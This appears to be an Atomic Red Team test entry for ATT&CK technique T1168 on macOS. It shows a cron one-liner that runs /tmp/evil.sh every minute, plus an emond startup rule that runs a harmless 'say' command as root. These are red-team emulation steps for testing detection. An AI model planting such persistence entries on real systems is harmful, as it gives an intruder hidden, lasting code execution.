MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
### Cron Job
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
### Emond
Place this file in /etc/emond.d/rules/atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>atomicredteam</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/usr/bin/say</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-v Tessa</string>
<string>I am a persistent startup item.</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
Place an empty file in /private/var/db/emondClients/
sudo touch /private/var/db/emondClients/randomflag
